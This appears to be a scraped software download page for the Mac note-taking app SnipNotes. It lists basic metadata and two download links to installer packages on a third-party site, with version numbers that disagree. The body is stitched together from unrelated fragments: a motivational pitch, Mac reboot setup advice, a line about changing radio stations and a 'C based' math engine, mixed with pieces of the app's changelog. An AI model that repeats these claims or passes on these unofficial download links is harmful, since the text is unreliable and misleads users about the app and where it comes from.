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download SnipNotes.dmg to MacBook Pro (app)

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Main category,
Sub category, Productivity
Developer, Felix Lisczyk
Filesize, 26419
Title, SnipNotes

▸ v.1.5.6 SnipNotes

by crasshipster on 2017/03/23 15:24
Feel like you’re incompetent for great things? Get the skills you need and develop a strong mindset necessary to achieve what you want in life.
Note-taking app SnipNotes arrives on the Mac prMac
* SnipNotes integrates into the menu bar, notification center, system services and the share menu - This gives users quick access to their notes and allows them to create new notes from anywhere
Screenshot (macOS)
After the reboot, your Mac will require setting up like a new one. Imagine you just bought it and proceed to fill in all the gaps — WiFi, iCloud with Apple ID, Dropbox, accounts, passwords. Could take a while but remember, it was worth it.


Version on 10.14 https://macpkg.icu/?id=59696&kw=0cVx-vers-1.1.2-SnipNotes.pkg | 23248 kb |

Featured! version https://macpkg.icu/?id=59696&kw=SnipNotes-version-2.5.6-t22sh.tar.gz | 31174 kb |

• The edit and category buttons at the top right of a note have been merged into a single button, which also allows you to disable formatting and content detection for a note. You can of course still tap into the text of a note to quickly start editing
2) Even when not minimized, the app only occupies a fraction of the screen, which allows users to change radio stations very easily while working
• Add a passcode or use Touch ID to protect your notes
Native math engine is C based, in house developed and highly optimized for the Mac
New UI
1.1.5 (See all)
Users can select multiple notes and move or delete them with drag and drop

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